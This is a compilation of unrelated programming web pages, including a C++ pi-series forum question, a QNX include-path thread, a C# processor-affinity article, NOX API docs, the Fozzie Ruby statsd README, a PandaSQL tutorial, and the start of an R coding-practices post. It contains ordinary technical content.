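Putting it together, the full command-prompt session, using the directory from this example, looks like this:

C:\> cd C:\javatutorial\example
C:\javatutorial\example> javac HelloWorld.java
C:\javatutorial\example> java HelloWorld
Hello World!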
Go to the Java video tutorial index page for more video tutorials.
Source: http://www.roseindia.net/java/training/first-java-program-video.shtml (CC-MAIN-2015-32, refinedweb, 349 words, Flesch reading ease 67.76)
I need help with a C++ problem
π = 4(1/1 - 1/3 + 1/5 - 1/7 + 1/9 - 1/11 + … + (-1)^n/(2n+1) + …)    (1)
How many terms of series (1) do you need to use before you get the approximation p of π, where:
a) p = 3.0 b) p = 3.1 c) p = 3.14 d) p = 3.141 e) p = 3.1415 f) p = 3.14159
I need to use the do-while loop or maybe the for loop. Please help me.
This is what i was trying to do but is not right..
#include <iostream>
using namespace std;

int main() {
    double c;
    double i, a = -1, b;
    double s = 0, p;
    cout << "Please enter a value for p." << endl;
    cin >> p;
    do {
        c = 4;
        a = -a;
        b = 2*i + 1;
        s += c * (a/b);
        i++;
    } while (s < p + 0.05 && s > p - 0.05); // i think the condition is wrong.
    cout << "The value of i is: " << i << endl;
    return 0;
}
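One possible reading of the assignment, sketched as a corrected program: initialize the counter, accumulate the terms of series (1) multiplied by 4, and stop once the running sum is within a tolerance of p. The tolerance is an assumption here; pick it to match the precision of each case a) through f), e.g. 0.05 for p = 3.0 and 0.0005 for p = 3.141.

#include <iostream>
#include <cmath>
using namespace std;

int main() {
    double p, tol;
    cout << "Enter target value p and tolerance (e.g. 3.14 0.005): ";
    cin >> p >> tol;

    double s = 0.0, a = -1.0;
    long i = 0;
    do {
        a = -a;                      // alternate the sign: +, -, +, ...
        s += 4.0 * a / (2.0*i + 1);  // add the next term, 4*(-1)^i/(2i+1)
        i++;
    } while (fabs(s - p) >= tol);    // stop when the sum is within tol of p

    cout << "Terms needed: " << i << endl;
    return 0;
}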
Source: https://www.daniweb.com/programming/software-development/threads/321756/c-determine-value-of (CC-MAIN-2018-30, refinedweb, 163 words, Flesch reading ease 103.32)
06-19-2012 12:24 PM
Played a bit more.
I added the directory C:/projects/temp with file process.h containing:
#error "Oops, opened wrong include process.h"
Added -IC:/projects/temp to the build, and it failed with that error.
I wasn't able to get -iquote working so I used -I-
I'm using a managed build, so edited my include path in momentics from the project's properties, QCC Compiler, preprocessor. I added Extra Options -I- and moved the preprocessor -I include directory for Qt into here as well so that it is after the -I.
This gives build line:
qcc -o src\main.o ..\src\main.cpp -V4.4.2,gcc_ntox86_cpp -w1 -IC:/blackberry/bbndk-2.0.1/target/qnx6/usr/includ
cc1plus: note: obsolete option -I- used, please use -iquote instead
(Obviously -iquote is supported, so I'll leave getting that working as an exercise.)
This built for me.
So.... if you want to have a #include "aSystemFile.h" mean something different from #include <aSystemFile.h> you can.
That doesn't really get to the issue that subsystems should be able to rely on opening files within their own subsystem without fear of a file being totally overridden in a project. I had thought that the preprocessor looks first in the directory of the including file. (Boost does this by having #include <boost/...> ) Still checking into that, so if anyone knows, please let us know.
Stuart
06-19-2012 12:51 PM
Well, the issue isn't with boost anymore, but with standard header usr/include/unistd.h (included by most Boost libraries), which contains the following line:
#include <process.h>
... where <process.h> is meant to refer to a (non-ANSI, non-POSIX, QNX-specific) file also in usr/include.
However, if any of your project directories happen to contain a file called process.h (or Process.h on case-insensitive filesystems) then it will override the one in usr/include, most likely causing a compile error.
You can use -iquote to keep the paths from being on the angle-bracket search path, but QCC doesn't support -iquote, so you need to pass it directly to GCC in the CCFLAGS parameter as follows:
-Wc,"-iquote\"path\""
In my project I now have a variable listing all of my project's subdirectories (could be replaced by a shell-find if I wanted it automated), followed by these lines:
comma := ,
ENGINE_ROOT = $(current_dir)/Engine
ENGINE_PATHS = $(foreach dir,$(ENGINE_DIRS),$(ENGINE_ROOT)/$(dir))
ENGINE_INCLUDES = $(foreach path,$(ENGINE_PATHS),-Wc$(comma)"-iquote\"$(path)\"")
Then I add $(ENGINE_INCLUDES) to the lines for CCFLAGS.
This works, however, if you have code to compile in those directories you've got extra work to do, because if you just add those directories to EXTRA_SRCVPATH then the build system will do you the favour of adding those directories back to EXTRA_INCVPATH, thereby nullifying all the work you just did.
So you need to manually add all your source files from your directories:
ENGINE_SRCS = $(foreach path,$(ENGINE_PATHS),$(wildcard $(path)/*.cpp))
SRCS += $(ENGINE_SRCS)
... then, down after the line where $(MKFILES_ROOT)/qmacros.mk is included, you need to add:
vpath %.cpp $(ENGINE_PATHS)
You should be able to modify this to support multiple file types as follows:
SUPPORTED_EXTS := cpp cxx c S s
ENGINE_SRCS = $(foreach path,$(ENGINE_PATHS),$(wildcard $(foreach ext,$(SUPPORTED_EXTS),$(path)/*.$(ext))))
SRCS += $(ENGINE_SRCS)
... then...
VPATH += $(ENGINE_PATHS)
Again, this is all pretty complicated just to get around a naming conflict on account of the existence of a non-standard header in QNX, and I'm still not aware if there may be any unintended side-effects to circumventing the standard QNX build mechanisms like this.
Dan.
06-19-2012 01:15 PM
06-19-2012 03:15 PM
I would argue that qnx/usr/include contains the OS-supplied include files for your target build.
As for your solution, it's starting to sound tricky.
Is the competing process.h in 3rd party software or your own project? That affects what you can do.
The issue is that sometimes you want the one file, sometimes you want the other file, sometimes you might want both, but they are called the same thing so you have to distinguish them based on their path. So playing with -I options is really getting around the issue that there is a name conflict with the include files for this target build.
Here are some other options, one of which you've already mentioned but not selected in your case:
- rename your process.h. Check that you don't collide with any other QNX system include file.
e.g. prepend with a subsystem suffix
- don't add the include directory for your process.h but instead #include relative directories
- put the parent directory of your process.h in the include path, and include "mynamespace/process.h"
- if the non-qnx process.h is self-contained in a subsystem, build that subsystem as a separate library. Unfortunately, this subsystem is likely to need unistd.h, which would eliminate this choice.
- add -I{QNX_TARGET} and explicitly include <usr/include/process.h> before including the file which pulls in unistd.h
I hope this either simplifies your solution or makes you satisfied with your current handling.
What you actually do depends of course on your specific project.
Stuart
06-19-2012 04:02 PM
With regards to each of your suggestions:
- rename your process.h. Check that you don't collide with any other QNX system include file.
e.g. prepend with a subsystem suffix
Yes, this is a valid option; however this is a large cross-platform project that's targeted under multiple systems, and according to our naming conventions I'd need to rename the Process class throughout the project to match it, so I'm hesitant (but not ruling out the possibility) to make such a wide-impacting change just to accommodate the quirks of this OS. (It also doesn't protect against or solve future naming collisions.)
- don't add the include directory for your process.h but instead #include relative directories
- put the parent directory of your process.h in the include path, and include "mynamespace/process.h"
Neither of these will work, unfortunately, because there are source files in the directory as well, and as soon as the directories are added to EXTRA_SRCVPATH they get added to EXTRA_INCVPATH automatically, so <unistd.h> will still pick up my Process.h instead of <process.h>.
- if the non-qnx process.h is self-contained in a subsystem, build that subsystem as a separate library. Unfortunately, this subsystem is likely to need unistd.h, which would eliminate this choice.
Yep...
- add -I{QNX_TARGET} and explicitly include <usr/include/process.h> before including the file which pulls in unistd.h
This is an interesting idea, but ultimately wouldn't work, at least not in my scenario. <unistd.h> would still pull in my Process.h, which has requirements based on a common header that's included via the command line, so it still wouldn't compile.
I'm going to continue on this route, and hope that I don't run into other problems as a result from it. If further problems do manifest, I will probably grit my teeth and rename the offending file.
Thanks,
Dan.
Source: https://supportforums.blackberry.com/t5/Native-Development/Boost-headers-won-t-compile/m-p/1775017 (CC-MAIN-2017-04, refinedweb, 1,231 words, Flesch reading ease 64.81)
There are a few different ways to set processor affinity and Edmond Woychowsky shows you two programmatic ways he has used in his projects.
Early in the history of the personal computer, the author and technology prophet Jerry Pournelle coined a law that went like this: "One user, one CPU". At the time a statement like that was something akin to heresy. It was, after all, a time when dinosaurs ruled the computing world and personal computers were looked upon as little more than very expensive toys.
However, time passed and in subsequent years Pournelle's law came to be considered somewhat conservative. So much so, in fact, that he actually modified his law to "One user, at least one CPU", which is essentially where we are now. Unfortunately, for developers, Jerry Pournelle never actually said what to use the additional processing power for.
This blog post is also available in the PDF format as a TechRepublic Download.
My own devices
As a developer left to my own devices the first use that I'd consider would be a multi-threaded application, but what if my goal was something that didn't readily lend itself to multi-threading or what if it was a prepackaged application?
Either of those scenarios would be an issue; fortunately, there is a solution to both that dates back to the very same days when personal computers were considered little more than very expensive toys. A point of interest is that, in those days, some of the high-end dinosaur computers actually had more than one CPU, and what the system administrators would do with those machines is treat them as multiple computers in a single box.
Alright, now that I know what I want to do, that only leaves the question of just how to accomplish the task. Fortunately there are both a programmatic solution for my own applications and a lazy approach for pre-written software. Being counted among the lazy, let's take a look at that approach first.
Manually setting processor affinity

Figure A shows the soffice.exe task in the task manager, which is the executable for Open Office, the open source office application suite, along with the various options available. One of these options is Processor Affinity, which when clicked displays the pop-up shown in Figure B, with a check box for each core. Processor affinity is set by checking one or the other check box. In cases where both are checked, the operating system will attempt to balance the load between the cores.
Figure A
Vista task manager
Figure B
Processor affinity
Now the real fun begins, because as the administrator of my own little computer I have both the power and ability to check or un-check the boxes as I feel necessary. Or, as I say when I'm feeling a bit of megalomania, "Let it run on the second core today." The result of this mental aberration is displayed in Figure C.
Figure C
Open Office on the second core
Setting processor affinity in C#
Ah, here is where I can really let my megalomania run free: programmatically picking which core or cores my application will run on. Now that's real power. Alright, I admit it: in my case it's more about not completely locking up the computer if things don't work out the way I intended. Come to think of it, things not going as intended is a perfect demonstration of processor affinity. Nothing says whoops like a tight loop.
To work with processor affinity in the .NET environment, it is necessary to use the System.Diagnostics namespace, which contains the Process class whose GetCurrentProcess() method is used to obtain a Process object associated with the currently active process. Of course, if I were working with a multi-threaded application I'd be using a different method. Once the process is obtained, the ProcessorAffinity property can be used to either set or get the processor affinity. It is important to remember that the ProcessorAffinity property is a bit mask where each bit represents a single CPU, so on a system with a dual-core CPU the possible values are as shown in Table A.
Table A

Value 1 (binary 01): run on the first core only
Value 2 (binary 10): run on the second core only
Value 3 (binary 11): run on either core

The code required to demonstrate processor affinity is surprisingly simple, as Listing A illustrates. The result of the code is shown in Figures D and E.
Listing A
Processor Affinity console application
using System;
using System.Diagnostics;
using System.Text;

namespace caAfinity
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("Current ProcessorAffinity: {0}",
                Process.GetCurrentProcess().ProcessorAffinity);
            Process.GetCurrentProcess().ProcessorAffinity = (System.IntPtr)2;
            Console.WriteLine("Current ProcessorAffinity: {0}",
                Process.GetCurrentProcess().ProcessorAffinity);
            while (true)
            { } // Tight CPU loop
        }
    }
}
Figure D
Demonstration running
Figure E
Vista task manager
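As a variation on Listing A, the same property can be set on another running process by its id; a sketch using the same System.Diagnostics members, where the process id passed on the command line is hypothetical input:

using System;
using System.Diagnostics;

namespace caAfinityById
{
    class Program
    {
        static void Main(string[] args)
        {
            // pass the target process id on the command line
            Process process = Process.GetProcessById(int.Parse(args[0]));
            process.ProcessorAffinity = (System.IntPtr)1; // bit mask: first core only
            Console.WriteLine("{0} now runs on core mask {1}",
                process.ProcessName, process.ProcessorAffinity);
        }
    }
}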
Conclusion
Developers being what they are, when given more of anything will undoubtedly find some way to use it. Don't believe me? Leaving an unattended pizza anywhere near a group of developers will prove me right. Seriously though, I hope that this example of what to do with the bounty of processing that Jerry Pournelle foresaw is of some use, especially for those occasions when, for one reason of another, multi-threading is out of the question.
Source: https://www.techrepublic.com/blog/software-engineer/set-processor-affinity-programmatically-in-a-multi-core-system/ (CC-MAIN-2021-43, refinedweb, 877 words, Flesch reading ease 51.68)
#include <NOX_LAPACK_Group.H>
Inheritance diagram for NOX::LAPACK::Group:
[virtual]

Applies the inverse of the Jacobian matrix to the given input vector and puts the answer in result.

Computes

    result = J^{-1} * input

where J is the Jacobian, input is the input vector, and result is the result vector.

The "Tolerance" parameter specifies that the solution should be such that the relative linear residual satisfies

    || J * result - input || / || input || < Tolerance

Reimplemented from NOX::Abstract::Group.
NOX::DeepCopy
Create a new Group of the same derived type as this one by cloning this one, and return a ref count pointer to the new group.
If type is NOX::DeepCopy, then we need to create an exact replica of "this". Otherwise, if type is NOX::ShapeCopy, we need only replicate the shape of "this" (only the memory is allocated, the values are not copied into the vectors and Jacobian). Returns NULL if clone is not supported.
Implements NOX::Abstract::Group.
Reimplemented in LOCA::LAPACK::Group.
Compute and store F(x).
Compute and store gradient.
We can pose the nonlinear equation problem as an optimization problem as follows:

    min f(x) = (1/2) || F(x) ||^2

In that case, the gradient (of f) is defined as

    g(x) = J(x)^T F(x)
Compute and store Jacobian.
Recall that F(x) = [F_1(x), ..., F_n(x)]^T. The Jacobian is denoted by J and defined by

    J_ij = dF_i/dx_j (x)
Reimplemented from NOX::Abstract::Group.
Compute the Newton direction, using parameters for the linear solve.
The Newton direction is the solution, s, of

    J s = -F(x)

The parameters are from the "Linear Solver" sublist of the "Direction" sublist that is passed to the solver during construction.

The "Tolerance" parameter may be added/modified in the sublist of "Linear Solver" parameters that is passed into this function. The solution should be such that

    || J s + F(x) || / || F(x) || < Tolerance
Compute x = grp.x + step * d.

Let x denote this group's solution vector. Let y denote the result of grp.getX(). Then set

    x = y + step * d

Throw an error if the copy fails.
Implements NOX::Abstract::Group.
Return the 2-norm of F(x).

In other words,

    sqrt( F_1^2 + F_2^2 + ... + F_n^2 )
Return true if the gradient is valid.
Return true if the Jacobian is valid.
Return true if the Newton direction is valid.
Copies the source group into this group.
Set the solution vector x to y.
Source: http://trilinos.sandia.gov/packages/docs/r7.0/packages/nox/doc/html/classNOX_1_1LAPACK_1_1Group.html (CC-MAIN-2014-10, refinedweb, 341 words, Flesch reading ease 59.6)
Fozzie
Ruby gem for registering statistics to a Statsd server in various ways.
Requirements
- A Statsd server
- Ruby 1.9
Basic Usage
Send through statistics depending on the type you want to provide:
Increment counter
Stats.increment 'wat' # increments the value in a Statsd bucket called 'some.prefix.wat';
                      # the exact bucket name depends on the bucket name prefix (see below)
Decrement counter
Stats.decrement 'wat'
Decrement counter - provide a value as integer
Stats.count 'wat', 5
Basic timing - provide a value in milliseconds
Stats.timing 'wat', 500
Timings - provide a block to time against (inline and do syntax supported)
Stats.time('wat') { sleep 5 }

Stats.time_to_do 'wat' do
  sleep 5
end

Stats.time_for('wat') { sleep 5 }
Gauges - register arbitrary values
Stats.gauge 'wat', 99
Events - register different events
Commits

Stats.commit
Stats.committed

Builds

Stats.built
Stats.build

Deployments

Stats.deployed
Stats.deploy

With a custom app:

Stats.deployed 'watapp'
Stats.deploy 'watapp'

Custom

Stats.event 'pull'

With a custom app:

Stats.event 'pull', 'watapp'
Boolean result - pass a value to be true or false, and increment on true
Stats.increment_on 'wat', duck.valid?
Sampling
Each of the above methods accepts a sample rate as the last argument (before any applicable blocks), e.g:
Stats.increment 'wat', 10
Stats.decrement 'wat', 10
Stats.count 'wat', 5, 10
Monitor
You can monitor methods with the following:

class FooBar
  _monitor
  def zar
    # my code here...
  end

  _monitor("my.awesome.bucket.name")
  def quux
    # something
  end
end

This will register the processing time for the method, every time it is called, under the Graphite bucket foo_bar.zar.
This will work on both class and instance methods.
Bulk
You can send a bulk of metrics using the bulk method:

Stats.bulk do
  increment 'wat'
  decrement 'wot'
  gauge 'foo', rand
  time_to_do('wat_timer') { sleep 4 }
end
This will send all the given metrics in a single packet to the statistics server.
Namespaces
Fozzie supports the following namespaces as default
Stats.increment 'wat'
S.increment 'wat'
Statistics.increment 'wat'
Warehouse.increment 'wat'
You can customise this via the YAML configuration (see instructions below)
Configuration
Fozzie is configured via a YAML or by setting a block against the Fozzie namespace.
YAML
Create a fozzie.yml within a config folder at the root of your app, which contains your settings for each env. A simple, verbose example below.

development:
  appname: wat
  host: '127.0.0.1'
  port: 8125
  namespaces: %w{Foo Bar Wat}
  prefix: %{foo bar car}
test:
  appname: wat
  host: 'localhost'
  port: 8125
  namespaces: %w{Foo Bar Wat}
production:
  appname: wat
  host: 'stats.wat.com'
  port: 8125
  namespaces: %w{Foo Bar Wat}
Configure block
Fozzie.configure do |config|
  config.appname = "wat"
  config.host = "127.0.0.1"
  config.port = 8125
  config.prefix = []
end
Prefixes
You can inject or set the prefix value for your application.
Fozzie.configure do |config|
  config.prefix = ['foo', 'wat', 'bar']
end

Fozzie.configure do |config|
  config.prefix << 'dynamic-value'
end
Prefixes are cached on first use, therefore any changes to the Fozzie configure prefix after first metric is sent in your application will be ignored.
Middleware
To time and register the controller actions within your Rack and Rails application, Fozzie provides some middleware.
Rack
require 'rack'
require 'fozzie/rack/middleware'

app = Rack::Builder.new {
  use Fozzie::Rack::Middleware
  lambda { |env| [200, {'Content-Type' => 'text/plain'}, 'OK'] }
}
Rails
See Fozzie Rails.
Bucket name prefixes
Fozzie automatically constructs bucket name prefixes from app name, hostname, and environment. For example:
Stats.increment 'wat'
increments the bucket named

app-name.your-computer-name.development.wat

when working on your development machine. This allows multiple application instances, in different environments, to be distinguished easily and collated in Graphite quickly.
The app name can be configured via the YAML configuration.
Low level behaviour
The current implementation of Fozzie wraps the sending of the statistic in a timeout and rescue block, which prevent long host lookups (i.e. if your stats server disappears) and minimises impact on your code or application if something is erroring at a low level.
Fozzie will try to log these errors, but only if a logger has been applied (which by default it does not). Examples:
require 'logger'
Fozzie.logger = Logger.new(STDOUT)

require 'logger'
Fozzie.logger = Logger.new 'log/fozzie.log'
This may change, depending on feedback and more production experience.
Credits
Currently supported and maintained by Marc Watts @ Lonely Planet Online.
Big thanks and credits:

- Etsy, whose Statsd product has enabled us to come such a long way in a very short period of time. We love Etsy.
- reinh for his statsd Gem.

Please contact me on anything... improvements will be needed and are welcomed greatly.
Source: http://www.rubydoc.info/gems/fozzie/frames (CC-MAIN-2015-27, refinedweb, 779 words, Flesch reading ease 61.22)
Concurrency
One of the commonly mentioned fallouts of the new processor architectures is the new face of applications written on the JVM. To take performance advantage of multiple cores, applications need to be more concurrent, and programmers need to find more parallelism within the application domain. Herb Sutter sums it up nicely in his landmark article.
Look Maa ! No Threads !
Writing multi-threaded code is hard, and, as the experts say, the best way to deal with multi-threading is to avoid it. The two dominant paradigms of concurrency available in modern day languages are:
- Shared State with Monitors, where concurrency is achieved through multiple threads of execution synchronized using locks, barriers, latches etc.
- Message Passing, which is a shared-nothing model using asynchronous messaging across lightweight processes or threads.
The second form of concurrent programming offers a higher level of abstraction where the user does not have to interact directly with the lower level primitives of thread models. Erlang supports this model of programming and has been used extensively in the telecommunications domain to achieve a great degree of parallelism. Java supports the first model, much to the horror of many experts of the domain, and unless you are Brian Goetz or Doug Lea, designing concurrent applications in Java is hard.
Actors on the JVM
Actor based concurrency in Erlang is highly scalable and offers a coarser-grained programming model to developers. Have a look at this presentation by Joe Armstrong which illustrates how the share-nothing model, lightweight processes and asynchronous messaging support make Erlang a truly Concurrency Oriented Programming Language. The presentation also gives us some interesting figures: an Erlang based web server supported more than 80,000 sessions while Apache crashed at around 4,000.
The new kid on the block, Scala, brings Erlang style actor based concurrency to the JVM. Developers can now design scalable concurrent applications on the JVM using Scala's actor model, which will automatically take advantage of multicore processors, without programming to the complicated thread model of Java. In applications which demand a large number of concurrent processes over a limited amount of memory, JVM threads prove to have a significant footprint because of stack maintenance overhead and locking contention. Scala actors provide an ideal model for programming in the non-cooperative virtual machine environment. Coupled with the pattern matching capabilities of the Scala language, we can have the full power of Erlang style concurrency on the JVM. The following example is from this recent paper by Philipp Haller and Martin Odersky:
class Counter extends Actor {
  override def run(): unit = loop(0)

  def loop(value: int): unit = {
    Console.println("Value: " + value)
    receive {
      case Incr()   => loop(value + 1)
      case Value(a) => a ! value; loop(value)
      case Lock(a)  => a ! value
                       receive { case UnLock(v) => loop(v) }
      case _        => loop(value)
    }
  }
}
and its typical usage, also from the same paper:
val counter = new Counter // create a counter actor
counter.start() // start the actor
counter ! Incr() // increment the value by sending the Incr() message
counter ! Value(this) // ask for the value
// and get it printed by waiting on receive
receive { case cvalue => Console.println(cvalue) }
Scala Actors
In Scala, actors come in two flavors:
- Thread based actors, that offer a higher-level abstraction of threads, which replace error-prone shared memory accesses and locks by asynchronous message passing and
- Event based actors, which are threadless and hence offer the enormous scalability that we get in Erlang based actors.
As the paper indicates, event based actors offer phenomenal scalability when benchmarked against thread based actors and thread based concurrency implementations in Java. The paper also demonstrates some of the cool features of library based design of concurrency abstractions in the sense that Scala contains no language support for concurrency beyond the standard thread model offered by the host environment.
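To make the distinction concrete, here is a minimal sketch of my own (not from the paper) of the counter in the event-based style: swapping receive for react lets the actor give up its thread while waiting for a message, which is where the scalability comes from. The message classes Incr and Value are assumed to be defined as in the earlier example.

class EventCounter extends Actor {
  override def run(): unit = loop(0)

  def loop(value: int): unit = {
    react {                       // react suspends the actor without blocking a thread
      case Incr()   => loop(value + 1)
      case Value(a) => a ! value; loop(value)
    }
  }
}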
I have been playing around with Scala for quite some time and have been thoroughly enjoying the innovations that the language offers. The actor based concurrency model is a definite addition to this list, more so since it promises to be a feature that programmers would love to have in their toolbox while implementing on the JVM. The JVM is where the future is, and event based actors in Scala will definitely be one of the things to watch out for.
8 comments:
How about dataflow concurrency, a very simple and error-free way of dealing with many threads?
See the Mozart/Oz language.
This is exactly what games are trying to do - cut back threading :)
Async concurrency paradigm was used in many environments *MANY* years ago, it's nothing new. Delphi's ICS components worked that way, for example.
Scala has dataflow concurrency in the form of a library that does futures and promises.
One of my Professors was working on an Actor Language extension to Java called SALSA:
I found that dealing with actor location was the largest annoyance... aside from the multi-step compiling.
[for Lozano :]
The asynch concurrency paradigm is nothing new. But the points of interest with Scala actors are two-fold:
a) Scala brings Erlang style concurrency on the JVM and today we are approaching the situation where JVM is being portrayed as the default platform for your application.
b) Threaded actors in Scala provide a higher level of abstraction than raw threads and locks, while event based actors provide huge scalability.
So it's a win-win situation.
Interesting but: I know the Erlang/Yaws comparison with Apache and I know Erlang can map all its threads to one OS thread to avoid overhead. But in order to exploit multiple CPUs you need to start multiple processes, not just Erlang threads. Which is possible in Erlang, too, but how much overhead can we still save then? Does the message passing approach really make the scalability gains, or isn't it more the saved overhead from mapping multiple Erlang threads to one OS thread? Note that we have seen big scalability gains with JVMs that did "Green Threads" - i.e. an N to one mapping - and there are also JVMs that can do N to M in order to exploit multiple CPUs while still keeping the number of native threads low. So, to me, the question is: how much scalability do we get from the thread mapping, and how much is really due to the radical "message passing share nothing" approach? Is explicit threading really that bad, or did we just fall victim to "suboptimal schedulers" in existing operating systems?
Corresponding value of a parameter
Hello, I am quite new to Sage and I have the following question. In my computations I have a quadratic form: $x^T A x = b $ , where the matrix A is defined already as a symmetric matrix, and x is defined as
import itertools
X = itertools.product([0, 1], repeat=n)
for x in X:
    x = vector(x)
    print x
I don't understand two things. There is no variable x or b in your code. Furthermore, if you run this code, what you get is an exhausted iterator X and a vector x equal to (1,1,...,1).
(note that you forgot the line import itertools in your command)
My apologies for ambiguity. I have edited the post. Hope it is now clearer.
the whole code, with the previously defined matrix A, looks like this:
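A minimal sketch of such a computation in Sage (my hedged reconstruction, since the pasted code is not shown), assuming A is an n-by-n symmetric matrix and b is a target value; it collects the binary vectors x achieving x^T A x = b:

import itertools

solutions = []
for bits in itertools.product([0, 1], repeat=n):
    x = vector(bits)
    if x * A * x == b:      # evaluate the quadratic form x^T A x
        solutions.append(x)
print solutions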
@Xenia It is much clearer now. I updated my answer below.
Originally posted on mlwhiz.
Pandas is one of the best data manipulation libraries in recent times. It lets you slice and dice, groupby, join and do any arbitrary data transformation. You can take a look at this post, which talks about handling most of the data manipulation cases using a straightforward, simple, and matter of fact way using Pandas.
But even with how awesome pandas generally is, there sometimes are moments when you would like to have just a bit more. Say you come from a SQL background in which the same operation was too easy. Or you wanted to have more readable code. Or you just wanted to run an ad-hoc SQL query on your data frame. Or, maybe you come from R and want a replacement for sqldf.
For example, one of the operations that Pandas doesn’t have an alternative for is non-equi joins, which are quite trivial in SQL.
In this series of posts named Python Shorts, I will explain some simple but very useful constructs provided by Python, some essential tips, and some use cases I come up with regularly in my Data Science work.
This post is essentially about using SQL with pandas Dataframes.
But, what are non-equi joins, and why would I need them?
Let’s say you have to join two data frames. One shows us the periods where we offer some promotions on some items. And the second one is our transaction Dataframe. I want to know the sales that were driven by promotions, i.e., the sales that happen for an item in the promotion period.
We can do this by doing a join on the item column as well as a join condition (TransactionDt≥StartDt and TransactionDt≤EndDt). Since now our join conditions have a greater than and less than signs as well, such joins are called non-equi joins. Do think about how you will do such a thing in Pandas before moving on.
The Pandas Solution
So how will you do it in Pandas? Yes, a Pandas based solution exists, though I don’t find it readable enough.
Let’s start by generating some random data to work with.
import pandas as pd
import random
import datetime

def random_dt_bw(start_date, end_date):
    days_between = (end_date - start_date).days
    random_num_days = random.randrange(days_between)
    random_dt = start_date + datetime.timedelta(days=random_num_days)
    return random_dt

def generate_data(n=1000):
    items = [f"i_{x}" for x in range(n)]
    start_dates = [random_dt_bw(datetime.date(2020,1,1), datetime.date(2020,9,1)) for x in range(n)]
    end_dates = [x + datetime.timedelta(days=random.randint(1,10)) for x in start_dates]
    offerDf = pd.DataFrame({"Item": items, "StartDt": start_dates, "EndDt": end_dates})
    transaction_items = [f"i_{random.randint(0,n)}" for x in range(5*n)]
    transaction_dt = [random_dt_bw(datetime.date(2020,1,1), datetime.date(2020,9,1)) for x in range(5*n)]
    sales_amt = [random.randint(0,1000) for x in range(5*n)]
    transactionDf = pd.DataFrame({"Item": transaction_items, "TransactionDt": transaction_dt, "Sales": sales_amt})
    return offerDf, transactionDf
offerDf,transactionDf = generate_data(n=100000)
You don’t need to worry about the random data generation code above. Just know how our random data looks like:
Once we have the data, we can do the non-equi join by merging the data on the column item and then filtering by the required condition.
merged_df = pd.merge(offerDf, transactionDf, on='Item')
pandas_solution = merged_df[(merged_df['TransactionDt'] >= merged_df['StartDt']) &
                            (merged_df['TransactionDt'] <= merged_df['EndDt'])]
The result is below just as we wanted:
The PandaSQL solution
The Pandas solution is alright, and it does what we want, but we could also have used PandaSQL to get the same thing done in a much more readable way.
PandaSQL provides us with a way to write SQL on Pandas Dataframes. So if you have got some SQL queries already written, it might make more sense to use pandaSQL rather than converting them to pandas syntax. To get started with PandaSQL we install it simply with:
pip install -U pandasql
Once we have pandaSQL installed, we can use it by creating a pysqldf function that takes a query as an input and runs the query to return a Pandas DF. Don’t worry about the syntax; it remains more or less constant.
from pandasql import sqldf
pysqldf = lambda q: sqldf(q, globals())
We can now run any SQL query on our Pandas data frames using this function. And, below is the non-equi join, we want to do in the much more readable SQL format.
q = """ SELECT A.*,B.TransactionDt,B.Sales FROM offerDf A INNER JOIN transactionDf B ON A.Item = B.Item AND A.StartDt <= B.TransactionDt AND A.EndDt >= B.TransactionDt; """ pandaSQL_solution = pysqldf(q)
The result is a pandas Dataframe as we would expect. The index is already reset for us, unlike before.
Caveats:
While the PandaSQL function lets us run SQL queries on our Pandas data frames and is an excellent tool to be aware of in certain situations, it is not as performant as pure pandas syntax.
When we time Pandas against the more readable PandaSQL, we find that the PandaSQL takes around 10x the time of native Pandas.
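As a rough way to reproduce that comparison yourself, a quick wall-clock sketch (mine, not the original benchmark; the exact numbers will vary with data size and machine) might look like:

import time

start = time.time()
merged_df = pd.merge(offerDf, transactionDf, on='Item')
pandas_solution = merged_df[(merged_df['TransactionDt'] >= merged_df['StartDt']) &
                            (merged_df['TransactionDt'] <= merged_df['EndDt'])]
print(f"pandas:   {time.time() - start:.2f}s")

start = time.time()
pandaSQL_solution = pysqldf(q)
print(f"pandasql: {time.time() - start:.2f}s")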
Conclusion
In this post of the Python Shorts series, we learned about pandaSQL, which lets us use SQL queries on our Dataframes. We also looked at how to do non-equi joins using both native pandas as well as pandaSQL.
While the PandaSQL library is not as performant as native pandas, it is a great addition to our data analytics toolbox when we want to do ad-hoc analysis and to people who feel much more comfortable with using SQL queries.
For a closer look at the code for this post, please visit my GitHub repository, where you can find the code for this post as well as all my posts.
Our world is generating more and more data, which people and businesses want to turn into something useful. This naturally attracts many data scientists – or sometimes called data analysts, data miners, and many other fancier names – who aim to help with this extraction of information from data.
A lot of data scientists around me graduated in statistics, mathematics, physics or biology. During their studies they focused on individual modelling techniques or nice visualizations for the papers they wrote. Nobody had ever taken a proper computer science course that would help them tame the programming language completely and allow them to produce a nice and professional code that is easy to read, can be re-used, runs fast and with reasonable memory requirements, is easy to collaborate on and most importantly gives reliable results.
I am no exception to this. During my studies we used R and Matlab to get hands-on experience with various machine learning techniques. We obviously focused on choosing the best model, tuning its parameters, solving for violated model assumptions and other rather theoretical concepts. So when I started my professional career I had to learn how to deal with imperfect input data, how to create a script that can run daily, how to fit the best model and store the predictions in a database, or even use them directly in some online client-facing endpoint.
To do this I took the standard path. Reading books, papers, blogs, trying new stuff working on hobby projects, googling, stack-overflowing and asking colleagues. But again mainly focusing on overcoming small ad hoc problems.
Luckily for me, I’ve met a few smart computer scientists on the way who showed me how to develop code that is more professional. Or at least less amateurish. What follows is a list of the most important points I had to learn since I left the university. These points allowed me to work on more complex problems both theoretically and technically. I must admit that making your coding skills better is a never ending story that restarts with every new project.
1. Parameters, constants and functions
You are able to easily re-use your code if you make it applicable to similar problems as well. A simple wisdom that is however quite tricky to apply in practice. Your building blocks here are parameters, constants and functions.
Parameters enable you to change important variables and settings in one place. You should never have anything hard-coded in the body of your code. Constants help you to define static variables that cannot be altered. Constants are useful for example when you need to compare strings.
library(caret)
library(futile.logger)

#' constants
DATASET_IRIS   <- 'iris'
DATASET_MTCARS <- 'mtcars'
IRIS_TARGET    <- 'Sepal.Length'
MTCARS_TARGET  <- 'mpg'
MODELLING_METHOD_RF  <- 'random forest'
MODELLING_METHOD_GBM <- 'gradient boosting machine'

#' parameters
DATASET          <- DATASET_IRIS
MODELLING_METHOD <- MODELLING_METHOD_GBM

#' load data
flog.info(paste0('Loading ', DATASET, ' dataset'))
if (DATASET == DATASET_IRIS) {
  data(iris)
  df <- iris
  target_variable <- IRIS_TARGET
} else if (DATASET == DATASET_MTCARS) {
  data(mtcars)
  df <- mtcars
  target_variable <- MTCARS_TARGET
}

#' create formula
modelling_formula <- as.formula(paste0(target_variable, '~.'))

#' train model
